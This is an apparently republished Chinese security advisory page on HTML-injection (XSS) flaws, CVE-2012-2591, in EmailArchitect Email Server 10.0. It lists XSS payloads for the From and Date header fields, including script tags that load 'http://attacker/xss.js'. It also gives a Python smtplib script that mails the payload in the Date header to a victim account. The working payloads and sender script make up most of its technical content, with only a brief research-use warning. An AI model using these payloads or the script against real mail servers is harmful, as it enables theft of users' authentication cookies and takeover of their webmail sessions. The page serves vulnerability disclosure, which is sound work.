首页 / 操作系统 / Linux / EmailArchitect Mail Server多个HTML注入漏洞

发布日期：2012-08-08
更新日期：2012-08-09受影响系统：
EmailArchitect EmailArchitect Email Server 10.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54896
CVE ID: CVE-2012-2591EmailArchitect是一款邮件服务器。EmailArchitect 10.0及其他版本在实现上存在HTML注入漏洞，攻击者可提供HTML或JS代码，在受影响站点中运行，窃取cookie身份验证凭证或控制站点外观。<*来源：loneferret
  *>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！nstalled On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 （x86）, OS: MAC OS Lion
Browser Used: Internet Explorer 9, Firefox 12Injection Point: From
Injection Payload（s）:
1:  ";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//--></SCRIPT>">"><SCRIPT>alert（String.fromCharCode（88,83,83））</SCRIPT>=&{}Injection Point: Date
Injection Payload（s）:
1: ";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//";alert（String.fromCharCode（88,83,83））//--></SCRIPT>">"><SCRIPT>alert（String.fromCharCode（88,83,83））</SCRIPT>=&{}
2: <SCRIPT>alert（"XSS"）</SCRIPT>
3: <SCRIPT SRC=http://attacker/xss.js></SCRIPT>
4: <SCRIPT>alert（String.fromCharCode（88,83,83））</SCRIPT>
5: <IFRAME SRC="javascript:alert（"XSS"）;"></IFRAME>
6: </TITLE><SCRIPT>alert（"XSS"）;</SCRIPT>
7: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT>
8: <SCRIPT a=">">" SRC="http://attacker/xss.js"></SCRIPT>"""
import smtplib, urllib2payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>"""def sendMail（dstemail, frmemail, smtpsrv, username, password）:
        msg  = "From: hacker@offsec.local "
        msg += "To: victim@victim.local "
        msg += "Date: Today" + payload + " "
        msg += "Subject: XSS "
        msg += "Content-type: text/html "
        msg += "XSS. "
        server = smtplib.SMTP（smtpsrv）
        server.login（username,password）
        try:
                server.sendmail（frmemail, dstemail, msg）
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str（e）
        server.quit（）username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"print "[*] Sending Email"
sendMail（dstemail, frmemail, smtpsrv, username, password）建议：
--------------------------------------------------------------------------------
厂商补丁：EmailArchitect
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.emailarchitect.net/Axigen Mail Server "Body"字段HTML注入漏洞SurgeMail"Body"字段HTML注入漏洞相关资讯      HTML注入漏洞  EmailArchitect 

Symantec Security Information   （07/05/2013 16:04:54） Django CMS "page_attribute"   （01/29/2013 10:18:23） IBM Intelligent Operations   （12/20/2012 08:24:59）

TP-Link TL-WA701N和TL-WA701ND目  （03/01/2013 21:04:10） Advantech WebAccess HMI/SCADA   （01/10/2013 08:07:25） MyBB User Profile Skype ID插件“  （12/19/2012 18:55:16）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站 收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图